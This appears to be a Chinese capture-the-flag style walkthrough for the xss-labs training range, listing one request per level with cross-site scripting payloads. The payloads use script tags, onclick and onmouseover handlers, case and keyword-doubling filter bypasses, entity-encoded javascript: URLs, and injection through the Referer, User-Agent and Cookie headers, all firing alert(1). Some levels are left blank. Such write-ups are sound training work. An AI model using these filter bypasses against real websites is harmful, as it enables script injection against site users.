【靶场】xss-labs通关攻略

前言

xss-labs通关攻略

17-20关需要对Flash进行XSS,如需在页面加载Flash可以使用浏览器插件Ruffle,如需反编译Flash源码可以使用jindrapetrik/jpexs-decompiler

Level1

request
1
GET /level1.php?name=<script>alert(1)</script>

Level2

request
1
GET /level2.php?name="/><script>alert(1)</script>

Level3

request
1
GET /level3.php?keyword=' onclick='javascript:alert(1);

Level4

request
1
GET /level4.php?keyword=" onclick="javascript:alert(1);

Level5

request
1
GET /level5.php?keyword="/><a href="javascript:alert(1);">1</a><input type="hidden" "

Level6

request
1
GET /level6.php?keyword="/><scripT>alert(1)</scripT>

Level7

request
1
GET /level7.php?keyword="/><scripscriptt>alert(1)</scripscriptt>

Level8

request
1
GET /level8.php?keyword=%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2341%3B

Level9

request
1
GET /level9.php?keyword=%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B%26%2341%3B<!-- http:// -->

Level10

request
1
GET /level10.php?keyword=1&t_sort=" onclick="javascript:alert(1);" type="

Level11

request
1
2
GET /level11.php?keyword=1
Referer: " onclick="javascript:alert(1);" type="

Level12

request
1
2
GET /level12.php?keyword=1
User-Agent: " onclick="javascript:alert(1);" type="

Level13

request
1
2
GET /level13.php?keyword=1
Cookie: user=" onclick="javascript:alert(1)" type=";

Level14

Level15

request
1
GET /level15.php?src='level1.php?name=<input onclick=alert(1)>'

Level16

request
1
GET /level16.php?keyword=<input%0aonclick=alert(1)>

Level17

request
1
GET /level17.php?arg01=a&arg02=b onmouseover=alert(1)
  • 将鼠标移到Flash上

Level18

request
1
GET /level18.php?arg01=a&arg02=b onmouseover=alert(1)

Level19

Level20

完成

参考文献

CSDN——重庆森林不在重庆